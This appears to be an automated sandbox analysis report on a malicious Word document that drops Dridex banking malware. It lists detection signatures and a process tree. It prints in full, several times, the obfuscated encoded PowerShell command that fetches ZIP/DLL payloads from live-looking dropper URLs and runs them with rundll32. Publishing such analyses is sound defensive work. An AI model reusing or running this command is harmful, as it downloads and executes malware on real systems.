Loading ...

Play interactive tourEdit tour

Analysis Report Order.802796810.doc

Overview

General Information

Sample Name:Order.802796810.doc
Analysis ID:339433
MD5:b1c2a32cb28d07acc8b2d65ab2012db8
SHA1:3ac3123decd86944a576227554edbcbb3d62aa58
SHA256:6951461b231a0f4f2ee086768d3e5e79b30dd68efd55da80997d73c160e6ddce

Most interesting Screenshot:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Document contains an embedded VBA with many randomly named variables
Encrypted powershell cmdline option found
Machine Learning detection for dropped file
Obfuscated command line found
Potential dropper URLs found in powershell memory
Powershell drops PE file
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 1068 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • cmd.exe (PID: 952 cmdline: cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc UwBlAFQALQBpAHQARQBtACAAdgBhAFIASQBhAEIAbABFADoAdwAyAEgAQwAgACgAWwB0AHkAUABFAF0AKAAiAHsAMAB9AHsAMgB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBzAHkAUwB0ACcALAAnAHIARQBDAHQAbwBSAHkAJwAsACcAZQBNAC4AaQBvAC4AJwAsACcARABpACcAKQAgACkAIAAgADsAIAAgACAAcwBFAHQALQBpAHQAZQBtACAAKAAiAFYAQQByAGkAYQAiACsAIgBiAGwAZQA6ACIAKwAiAHMAIgArACIAOQBuADYAIgApACAAKAAgAFsAdAB5AHAAZQBdACgAIgB7ADQAfQB7ADAAfQB7ADcAfQB7ADUAfQB7ADgAfQB7ADMAfQB7ADYAfQB7ADIAfQB7ADEAfQAiAC0AZgAgACcAcwBUAEUAbQAuAG4AJwAsACcARQBSACcALAAnAG4AYQBnACcALAAnAGkAYwAnACwAJwBTAHkAJwAsACcALgAnACwAJwBFAFAAbwBpAE4AdABtAGEAJwAsACcARQBUACcALAAnAFMAZQByAHYAJwApACAAIAApADsAIAAkAFIAegBlADgAbQBzADEAPQAkAEwAXwA3AEYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFoANAAwAEoAOwAkAFUANQAxAEIAPQAoACgAJwBJACcAKwAnADgANgAnACkAKwAnAFkAJwApADsAIAAkAHcAMgBoAEMAOgA6ACIAYwByAEUAYQB0AGAAZQBEAGkAYABSAGUAYwB0AE8AYABSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBGAHAAJwArACgAJwBmAEwAJwArACcAeAA4ACcAKQArACgAJwBvACcAKwAnADAAcwAnACsAJwB6AEYAcAAnACkAKwAoACcAZgBHAHoAdABhACcAKwAnAHoAawAnACkAKwAoACcAbABGACcAKwAnAHAAJwApACsAJwBmACcAKQAtAHIARQBwAGwAYQBDAEUAIAAoACcARgAnACsAJwBwAGYAJwApACwAWwBDAGgAQQByAF0AOQAyACkAKQA7ACQAUQA4ADEAQgA9ACgAJwBYACcAKwAoACcANAAnACsAJwBfAFYAJwApACkAOwAgACQAUwA5AE4ANgA6ADoAIgBzAEUAYwB1AHIAYABpAGAAVABZAHAAUgBvAGAAVABPAGMATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABQADUANQBMAD0AKAAoACcASQAnACsAJwBfADYAJwApACsAJwBGACcAKQA7ACQATwBsAHYAdgB3AG4ANgAgAD0AIAAoACgAJwBJACcAKwAnADEAMQAnACkAKwAnAEYAJwApADsAJABJADgAMgBPAD0AKAAnAEkAJwArACgAJwAzADQAJwArACcAUgAnACkAKQA7ACQAVQBvADcAbwBsAHUAZQA9ACQASABPAE0ARQArACgAKAAoACcAYwBIACcAKwAnAHEAJwApACsAKAAnAEwAeAA4ACcAKwAnAG8AJwArACcAMABzACcAKQArACgAJwB6AGMASAAnACsAJwBxACcAKQArACgAJwBHAHoAdAAnACsAJwBhAHoAJwApACsAKAAnAGsAJwArACcAbABjAEgAcQAnACkAKQAgACAALQBSAGUAcABsAEEAQwBFACAAKABbAEMASABhAFIAXQA5ADkAKwBbAEMASABhAFIAXQA3ADIAKwBbAEMASABhAFIAXQAxADEAMwApACwAWwBDAEgAYQBSAF0AOQAyACkAKwAkAE8AbAB2AHYAdwBuADYAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFMAXwA2AFAAPQAoACcAUgAnACsAKAAnADUAMQAnACsAJwBOACcAKQApADsAJABHAHQAMABlAHMAMQB1AD0AKAAoACcAQQBdACcAKwAnAFsAJwArACcAcQBbAEQAJwApACsAJwA6AC8AJwArACgAJwAvAG0AJwArACcAYQBpACcAKQArACgAJwBsAC4AJwArACcAawAnACkAKwAnAHkAbwAnACsAJwBqACcAKwAnAGkAbgAnACsAKAAnAGMAJwArACcAbwBuAGQAJwApACsAJwB1AGkAJwArACcAdAAnACsAJwBzAC4AJwArACgAJwBjAG8AbQAvAGoAJwArACcAaABnAHUAJwArACcAbgAnACkAKwAoACcANwA1ACcAKwAnADMAJwApACsAKAAnAC4AegBpAHAAQABBAF0AWwAnACsAJwBxAFsARAAnACsAJwA6AC8ALwAnACkAKwAnAGEAJwArACgAJwBjAGMAdQByACcAKwAnAGEAdAAnACsAJwBlAGIAYwAnACkAKwAoACcALgBnAHIAJwArACcALwBlADAAbAB3ACcAKwAnADMAdAAuAHoAJwArACcAaQAnACkAKwAoACcAcABAACcAKwAnAEEAXQAnACkAKwAnAFsAcQAnACsAKAAnAFsARAAnACsAJwA6ACcAKQArACgAJwAvAC8AdAB1ACcAKwAnAG0AawAnACkAKwAoACcAdQB2AC4AbwAnACsAJwByACcAKQArACgAJwBnAC4AdAByAC8AJwArACcAegAnACsAJwBkADgAJwApACsAJwBkAHgAJwArACgAJwBiADIAdQAnACsAJwAuAHoAaQAnACsAJwBwACcAKQArACcAQAAnACsAKAAnAEEAJwArACcAXQBbACcAKQArACcAcQBbACcAKwAnAEQAOgAnACsAJwAvAC8AJwArACcAdAAnACsAJwBoAGUAJwArACgAJwB3ACcAKwAnAG8AcgBsAGQAbwBmAGoAYQBjACcAKwAnAG8AJwArACcAYgAuACcAKQArACcAYwAnACsAJwBvAG0AJwArACgAJwAvAGMAagBzACcAKwAnAG8AJwApACsAKAAnAG0AbABvACcAKwAnAC4AegBpAHAAQAAnACkAKwAoACcAQQAnACsAJwBdAFsAcQAnACkAKwAnAFsAJwArACgAJwBEADoALwAnACsAJwAvACcAKQArACcAZQAtACcAKwAoACcAbQBhAGMAbwAnACsAJwBtACcAKQArACcALgAnACsAKAAnAGMAJwArACcAbwBtAC4AJwApACsAKAAnAGIAJwArACcAcgAvAGMAbAAzACcAKQArACcANQAnACsAKAAnAGUAMAAuAHoAaQBwACcAKwAnAEAAQQAnACsAJwBdAFsAJwApACsAJwBxAFsAJwArACgAJwBEACcAKwAnADoALwAnACkAKwAnAC8AbAAnACsAKAAnAGUAZwAnACsAJwBpACcAKwAnAG8AbgAuAHMAJwArACcAZQByACcAKwAnAGkAZQBzAG4AJwApACsAJwBvAHcAJwArACgAJwAuAHcAZQAnACsAJwBiACcAKQArACgAJwBzAGkAdAAnACsAJwBlACcAKQArACcALwBxACcAKwAoACcAMwAnACsAJwAzAHIAdgAnACkAKwAnADIAJwArACgAJwAuAHoAaQAnACsAJwBwACcAKQApAC4AIgByAGUAYABwAGwAYABBAEMARQAiACgAKAAoACcAQQBdACcAKwAnAFsAJwApACsAJwBxACcAKwAnAFsARAAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAoACcAZAAnACsAKAAnAHMAJwArACcAZQB3AGYAJwApACkALAAoACcAdwAnACsAKAAnAGUAdgB3ACcAKwAnAGUAJwApACkAKQAsACgAJwBhAGUAJwArACcAZgBmACcAKQAsACgAKAAnAGgAdAAnACsAJwB0ACcAKQArACcAcAAnACkAKQBbADIAXQApAC4AIgBTAFAAbABgAGkAdAAiACgAJABLADEANwBQACAAKwAgACQAUgB6AGUAOABtAHMAMQAgACsAIAAkAEoAMgA0AEwAKQA7ACQAUAA4ADkASgA9ACgAJwBHADIAJwArACcANQBQACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQARwBoAGIAcgBjAGYAXwAgAGkAbgAgACQARwB0ADAAZQBzADEAdQApAHsAdAByAHkAewAoACYAKAAnAE4AJwArACcAZQB3AC0ATwBiAGoAZQBjACcAKwAnAHQAJwApACAAUwBZAFMAdABlAG0ALgBuAEUAdAAuAHcARQBiAEMAbABpAEUATgBUACkALgAiAEQATwB3AGAATgBMAE8AQQBEAGYAaQBgAEwAZQAiACgAJABHAGgAYgByAGMAZgBfACwAIAAkAFUAbwA3AG8AbAB1AGUAKQA7ACQASwAxADgASwA9ACgAJwBKACcAKwAoACcANQBfACcAKwAnAFoAJwApACkAOwBJAGYAIAAoACgALgAoACcARwBlACcAKwAnAHQALQAnACsAJwBJAHQAZQBtACcAKQAgACQAVQBvADcAbwBsAHUAZQApAC4AIgBMAGUAYABOAGcAVABoACIAIAAtAGcAZQAgADQANgAwADkANQApACAAewAmACgAJwByAHUAJwArACcAbgBkAGwAbAAnACsAJwAzADIAJwApACAAJABVAG8ANwBvAGwAdQBlACwAKAAoACcAUgAnACsAJwB1AG4ARAAnACkAKwAnAGwAbAAnACkALgAiAFQAYABPAHMAVAByAGkAYABOAGcAIgAoACkAOwAkAFoANgAyAEgAPQAoACgAJwBCACcAKwAnADcAOAAnACkAKwAnAFcAJwApADsAYgByAGUAYQBrADsAJABYADAANABMAD0AKAAoACcARQAnACsAJwAyADQAJwApACsAJwBBACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAWgA1ADEAUwA9ACgAJwBJACcAKwAoACcAMwAnACsAJwA5AE0AJwApACkA MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • msg.exe (PID: 2384 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)
    • powershell.exe (PID: 2520 cmdline: powershell -w hidden -enc UwBlAFQALQBpAHQARQBtACAAdgBhAFIASQBhAEIAbABFADoAdwAyAEgAQwAgACgAWwB0AHkAUABFAF0AKAAiAHsAMAB9AHsAMgB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBzAHkAUwB0ACcALAAnAHIARQBDAHQAbwBSAHkAJwAsACcAZQBNAC4AaQBvAC4AJwAsACcARABpACcAKQAgACkAIAAgADsAIAAgACAAcwBFAHQALQBpAHQAZQBtACAAKAAiAFYAQQByAGkAYQAiACsAIgBiAGwAZQA6ACIAKwAiAHMAIgArACIAOQBuADYAIgApACAAKAAgAFsAdAB5AHAAZQBdACgAIgB7ADQAfQB7ADAAfQB7ADcAfQB7ADUAfQB7ADgAfQB7ADMAfQB7ADYAfQB7ADIAfQB7ADEAfQAiAC0AZgAgACcAcwBUAEUAbQAuAG4AJwAsACcARQBSACcALAAnAG4AYQBnACcALAAnAGkAYwAnACwAJwBTAHkAJwAsACcALgAnACwAJwBFAFAAbwBpAE4AdABtAGEAJwAsACcARQBUACcALAAnAFMAZQByAHYAJwApACAAIAApADsAIAAkAFIAegBlADgAbQBzADEAPQAkAEwAXwA3AEYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFoANAAwAEoAOwAkAFUANQAxAEIAPQAoACgAJwBJACcAKwAnADgANgAnACkAKwAnAFkAJwApADsAIAAkAHcAMgBoAEMAOgA6ACIAYwByAEUAYQB0AGAAZQBEAGkAYABSAGUAYwB0AE8AYABSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBGAHAAJwArACgAJwBmAEwAJwArACcAeAA4ACcAKQArACgAJwBvACcAKwAnADAAcwAnACsAJwB6AEYAcAAnACkAKwAoACcAZgBHAHoAdABhACcAKwAnAHoAawAnACkAKwAoACcAbABGACcAKwAnAHAAJwApACsAJwBmACcAKQAtAHIARQBwAGwAYQBDAEUAIAAoACcARgAnACsAJwBwAGYAJwApACwAWwBDAGgAQQByAF0AOQAyACkAKQA7ACQAUQA4ADEAQgA9ACgAJwBYACcAKwAoACcANAAnACsAJwBfAFYAJwApACkAOwAgACQAUwA5AE4ANgA6ADoAIgBzAEUAYwB1AHIAYABpAGAAVABZAHAAUgBvAGAAVABPAGMATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABQADUANQBMAD0AKAAoACcASQAnACsAJwBfADYAJwApACsAJwBGACcAKQA7ACQATwBsAHYAdgB3AG4ANgAgAD0AIAAoACgAJwBJACcAKwAnADEAMQAnACkAKwAnAEYAJwApADsAJABJADgAMgBPAD0AKAAnAEkAJwArACgAJwAzADQAJwArACcAUgAnACkAKQA7ACQAVQBvADcAbwBsAHUAZQA9ACQASABPAE0ARQArACgAKAAoACcAYwBIACcAKwAnAHEAJwApACsAKAAnAEwAeAA4ACcAKwAnAG8AJwArACcAMABzACcAKQArACgAJwB6AGMASAAnACsAJwBxACcAKQArACgAJwBHAHoAdAAnACsAJwBhAHoAJwApACsAKAAnAGsAJwArACcAbABjAEgAcQAnACkAKQAgACAALQBSAGUAcABsAEEAQwBFACAAKABbAEMASABhAFIAXQA5ADkAKwBbAEMASABhAFIAXQA3ADIAKwBbAEMASABhAFIAXQAxADEAMwApACwAWwBDAEgAYQBSAF0AOQAyACkAKwAkAE8AbAB2AHYAdwBuADYAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFMAXwA2AFAAPQAoACcAUgAnACsAKAAnADUAMQAnACsAJwBOACcAKQApADsAJABHAHQAMABlAHMAMQB1AD0AKAAoACcAQQBdACcAKwAnAFsAJwArACcAcQBbAEQAJwApACsAJwA6AC8AJwArACgAJwAvAG0AJwArACcAYQBpACcAKQArACgAJwBsAC4AJwArACcAawAnACkAKwAnAHkAbwAnACsAJwBqACcAKwAnAGkAbgAnACsAKAAnAGMAJwArACcAbwBuAGQAJwApACsAJwB1AGkAJwArACcAdAAnACsAJwBzAC4AJwArACgAJwBjAG8AbQAvAGoAJwArACcAaABnAHUAJwArACcAbgAnACkAKwAoACcANwA1ACcAKwAnADMAJwApACsAKAAnAC4AegBpAHAAQABBAF0AWwAnACsAJwBxAFsARAAnACsAJwA6AC8ALwAnACkAKwAnAGEAJwArACgAJwBjAGMAdQByACcAKwAnAGEAdAAnACsAJwBlAGIAYwAnACkAKwAoACcALgBnAHIAJwArACcALwBlADAAbAB3ACcAKwAnADMAdAAuAHoAJwArACcAaQAnACkAKwAoACcAcABAACcAKwAnAEEAXQAnACkAKwAnAFsAcQAnACsAKAAnAFsARAAnACsAJwA6ACcAKQArACgAJwAvAC8AdAB1ACcAKwAnAG0AawAnACkAKwAoACcAdQB2AC4AbwAnACsAJwByACcAKQArACgAJwBnAC4AdAByAC8AJwArACcAegAnACsAJwBkADgAJwApACsAJwBkAHgAJwArACgAJwBiADIAdQAnACsAJwAuAHoAaQAnACsAJwBwACcAKQArACcAQAAnACsAKAAnAEEAJwArACcAXQBbACcAKQArACcAcQBbACcAKwAnAEQAOgAnACsAJwAvAC8AJwArACcAdAAnACsAJwBoAGUAJwArACgAJwB3ACcAKwAnAG8AcgBsAGQAbwBmAGoAYQBjACcAKwAnAG8AJwArACcAYgAuACcAKQArACcAYwAnACsAJwBvAG0AJwArACgAJwAvAGMAagBzACcAKwAnAG8AJwApACsAKAAnAG0AbABvACcAKwAnAC4AegBpAHAAQAAnACkAKwAoACcAQQAnACsAJwBdAFsAcQAnACkAKwAnAFsAJwArACgAJwBEADoALwAnACsAJwAvACcAKQArACcAZQAtACcAKwAoACcAbQBhAGMAbwAnACsAJwBtACcAKQArACcALgAnACsAKAAnAGMAJwArACcAbwBtAC4AJwApACsAKAAnAGIAJwArACcAcgAvAGMAbAAzACcAKQArACcANQAnACsAKAAnAGUAMAAuAHoAaQBwACcAKwAnAEAAQQAnACsAJwBdAFsAJwApACsAJwBxAFsAJwArACgAJwBEACcAKwAnADoALwAnACkAKwAnAC8AbAAnACsAKAAnAGUAZwAnACsAJwBpACcAKwAnAG8AbgAuAHMAJwArACcAZQByACcAKwAnAGkAZQBzAG4AJwApACsAJwBvAHcAJwArACgAJwAuAHcAZQAnACsAJwBiACcAKQArACgAJwBzAGkAdAAnACsAJwBlACcAKQArACcALwBxACcAKwAoACcAMwAnACsAJwAzAHIAdgAnACkAKwAnADIAJwArACgAJwAuAHoAaQAnACsAJwBwACcAKQApAC4AIgByAGUAYABwAGwAYABBAEMARQAiACgAKAAoACcAQQBdACcAKwAnAFsAJwApACsAJwBxACcAKwAnAFsARAAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAoACcAZAAnACsAKAAnAHMAJwArACcAZQB3AGYAJwApACkALAAoACcAdwAnACsAKAAnAGUAdgB3ACcAKwAnAGUAJwApACkAKQAsACgAJwBhAGUAJwArACcAZgBmACcAKQAsACgAKAAnAGgAdAAnACsAJwB0ACcAKQArACcAcAAnACkAKQBbADIAXQApAC4AIgBTAFAAbABgAGkAdAAiACgAJABLADEANwBQACAAKwAgACQAUgB6AGUAOABtAHMAMQAgACsAIAAkAEoAMgA0AEwAKQA7ACQAUAA4ADkASgA9ACgAJwBHADIAJwArACcANQBQACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQARwBoAGIAcgBjAGYAXwAgAGkAbgAgACQARwB0ADAAZQBzADEAdQApAHsAdAByAHkAewAoACYAKAAnAE4AJwArACcAZQB3AC0ATwBiAGoAZQBjACcAKwAnAHQAJwApACAAUwBZAFMAdABlAG0ALgBuAEUAdAAuAHcARQBiAEMAbABpAEUATgBUACkALgAiAEQATwB3AGAATgBMAE8AQQBEAGYAaQBgAEwAZQAiACgAJABHAGgAYgByAGMAZgBfACwAIAAkAFUAbwA3AG8AbAB1AGUAKQA7ACQASwAxADgASwA9ACgAJwBKACcAKwAoACcANQBfACcAKwAnAFoAJwApACkAOwBJAGYAIAAoACgALgAoACcARwBlACcAKwAnAHQALQAnACsAJwBJAHQAZQBtACcAKQAgACQAVQBvADcAbwBsAHUAZQApAC4AIgBMAGUAYABOAGcAVABoACIAIAAtAGcAZQAgADQANgAwADkANQApACAAewAmACgAJwByAHUAJwArACcAbgBkAGwAbAAnACsAJwAzADIAJwApACAAJABVAG8ANwBvAGwAdQBlACwAKAAoACcAUgAnACsAJwB1AG4ARAAnACkAKwAnAGwAbAAnACkALgAiAFQAYABPAHMAVAByAGkAYABOAGcAIgAoACkAOwAkAFoANgAyAEgAPQAoACgAJwBCACcAKwAnADcAOAAnACkAKwAnAFcAJwApADsAYgByAGUAYQBrADsAJABYADAANABMAD0AKAAoACcARQAnACsAJwAyADQAJwApACsAJwBBACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAWgA1ADEAUwA9ACgAJwBJACcAKwAoACcAMwAnACsAJwA5AE0AJwApACkA MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • rundll32.exe (PID: 2532 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lx8o0sz\Gztazkl\I11F.dll RunDll MD5: DD81D91FF3B0763C392422865C9AC12E)
        • rundll32.exe (PID: 2556 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lx8o0sz\Gztazkl\I11F.dll RunDll MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

Threatname: Dridex

{"Config: ": ["--------------------------------------------------", "BOT ID", "--------------------------------------------------", "Bot id : 52270", "--------------------------------------------------", "IP Address table", "--------------------------------------------------", "Address count 0"]}

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Suspicious Encoded PowerShell Command LineShow sources
Source: Process startedAuthor: Florian Roth, Markus Neis: Data: Command: powershell -w hidden -enc UwBlAFQALQBpAHQARQBtACAAdgBhAFIASQBhAEIAbABFADoAdwAyAEgAQwAgACgAWwB0AHkAUABFAF0AKAAiAHsAMAB9AHsAMgB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBzAHkAUwB0ACcALAAnAHIARQBDAHQAbwBSAHkAJwAsACcAZQBNAC4AaQBvAC4AJwAsACcARABpACcAKQAgACkAIAAgADsAIAAgACAAcwBFAHQALQBpAHQAZQBtACAAKAAiAFYAQQByAGkAYQAiACsAIgBiAGwAZQA6ACIAKwAiAHMAIgArACIAOQBuADYAIgApACAAKAAgAFsAdAB5AHAAZQBdACgAIgB7ADQAfQB7ADAAfQB7ADcAfQB7ADUAfQB7ADgAfQB7ADMAfQB7ADYAfQB7ADIAfQB7ADEAfQAiAC0AZgAgACcAcwBUAEUAbQAuAG4AJwAsACcARQBSACcALAAnAG4AYQBnACcALAAnAGkAYwAnACwAJwBTAHkAJwAsACcALgAnACwAJwBFAFAAbwBpAE4AdABtAGEAJwAsACcARQBUACcALAAnAFMAZQByAHYAJwApACAAIAApADsAIAAkAFIAegBlADgAbQBzADEAPQAkAEwAXwA3AEYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFoANAAwAEoAOwAkAFUANQAxAEIAPQAoACgAJwBJACcAKwAnADgANgAnACkAKwAnAFkAJwApADsAIAAkAHcAMgBoAEMAOgA6ACIAYwByAEUAYQB0AGAAZQBEAGkAYABSAGUAYwB0AE8AYABSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBGAHAAJwArACgAJwBmAEwAJwArACcAeAA4ACcAKQArACgAJwBvACcAKwAnADAAcwAnACsAJwB6AEYAcAAnACkAKwAoACcAZgBHAHoAdABhACcAKwAnAHoAawAnACkAKwAoACcAbABGACcAKwAnAHAAJwApACsAJwBmACcAKQAtAHIARQBwAGwAYQBDAEUAIAAoACcARgAnACsAJwBwAGYAJwApACwAWwBDAGgAQQByAF0AOQAyACkAKQA7ACQAUQA4ADEAQgA9ACgAJwBYACcAKwAoACcANAAnACsAJwBfAFYAJwApACkAOwAgACQAUwA5AE4ANgA6ADoAIgBzAEUAYwB1AHIAYABpAGAAVABZAHAAUgBvAGAAVABPAGMATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABQADUANQBMAD0AKAAoACcASQAnACsAJwBfADYAJwApACsAJwBGACcAKQA7ACQATwBsAHYAdgB3AG4ANgAgAD0AIAAoACgAJwBJACcAKwAnADEAMQAnACkAKwAnAEYAJwApADsAJABJADgAMgBPAD0AKAAnAEkAJwArACgAJwAzADQAJwArACcAUgAnACkAKQA7ACQAVQBvADcAbwBsAHUAZQA9ACQASABPAE0ARQArACgAKAAoACcAYwBIACcAKwAnAHEAJwApACsAKAAnAEwAeAA4ACcAKwAnAG8AJwArACcAMABzACcAKQArACgAJwB6AGMASAAnACsAJwBxACcAKQArACgAJwBHAHoAdAAnACsAJwBhAHoAJwApACsAKAAnAGsAJwArACcAbABjAEgAcQAnACkAKQAgACAALQBSAGUAcABsAEEAQwBFACAAKABbAEMASABhAFIAXQA5ADkAKwBbAEMASABhAFIAXQA3ADIAKwBbAEMASABhAFIAXQAxADEAMwApACwAWwBDAEgAYQBSAF0AOQAyACkAKwAkAE8AbAB2AHYAdwBuADYAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFMAXwA2AFAAPQAoACcAUgAnACsAKAAnADUAMQAnACsAJwBOACcAKQApADsAJABHAHQAMABlAHMAMQB1AD0AKAAoACcAQQBdACcAKwAnAFsAJwArACcAcQBbAEQAJwApACsAJwA6AC8AJwArACgAJwAvAG0AJwArACcAYQBpACcAKQArACgAJwBsAC4AJwArACcAawAnACkAKwAnAHkAbwAnACsAJwBqACcAKwAnAGkAbgAnACsAKAAnAGMAJwArACcAbwBuAGQAJwApACsAJwB1AGkAJwArACcAdAAnACsAJwBzAC4AJwArACgAJwBjAG8AbQAvAGoAJwArACcAaABnAHUAJwArACcAbgAnACkAKwAoACcANwA1ACcAKwAnADMAJwApACsAKAAnAC4AegBpAHAAQABBAF0AWwAnACsAJwBxAFsARAAnACsAJwA6AC8ALwAnACkAKwAnAGEAJwArACgAJwBjAGMAdQByACcAKwAnAGEAdAAnACsAJwBlAGIAYwAnACkAKwAoACcALgBnAHIAJwArACcALwBlADAAbAB3ACcAKwAnADMAdAAuAHoAJwArACcAaQAnACkAKwAoACcAcABAACcAKwAnAEEAXQAnACkAKwAnAFsAcQAnACsAKAAnAFsARAAnACsAJwA6ACcAKQArACgAJwAvAC8AdAB1ACcAKwAnAG0AawAnACkAKwAoACcAdQB2AC4AbwAnACsAJwByACcAKQArACgAJwBnAC4AdAByAC8AJwArACcAegAnACsAJwBkADgAJwApACsAJwBkAHgAJwArACgAJwBiADIAdQAnACsAJwAuAHoAaQAnACsAJwBwACcAKQArACcAQAAnACsAKAAnAEEAJwArACcAXQBbACcAKQArACcAcQBbACcAKwAnAEQAOgAnACsAJwAvAC8AJwArACcAdAAnACsAJwBoAGUAJwArACgAJwB3ACcAKwAnAG8AcgBsAGQAbwBmAGoAYQBjACcAKwAnAG8AJwArACcAYgAuACcAK

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus detection for URL or domainShow sources
Source: http://mail.kyojinconduits.com/jhgun753.zipAvira URL Cloud: Label: malware
Found malware configurationShow sources
Source: 7.2.rundll32.exe.8c0000.1.raw.unpackMalware Configuration Extractor: Dridex {"Config: ": ["--------------------------------------------------", "BOT ID", "--------------------------------------------------", "Bot id : 52270", "--------------------------------------------------", "IP Address table", "--------------------------------------------------", "Address count 0"]}
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\Lx8o0sz\Gztazkl\I11F.dllReversingLabs: Detection: 43%
Machine Learning detection for dropped fileShow sources
Source: C:\Users\user\Lx8o0sz\Gztazkl\I11F.dllJoe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2089688133.0000000001D57000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2089688133.0000000001D57000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2089688133.0000000001D57000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2089688133.0000000001D57000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2089688133.0000000001D57000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2089688133.0000000001D57000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2089799072.0000000001F40000.00000002.00000001.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
Source: global trafficDNS query: name: mail.kyojinconduits.com
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.54.126.36:80
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.54.126.36:80

Networking:

barindex
Potential dropper URLs found in powershell memoryShow sources
Source: powershell.exe, 00000005.00000002.2094783076.0000000003BB5000.00000004.00000001.sdmpString found in memory: http://mail.kyojinconduits.com/jhgun753.zip
Source: powershell.exe, 00000005.00000002.2094783076.0000000003BB5000.00000004.00000001.sdmpString found in memory: http://accuratebc.gr/e0lw3t.zip
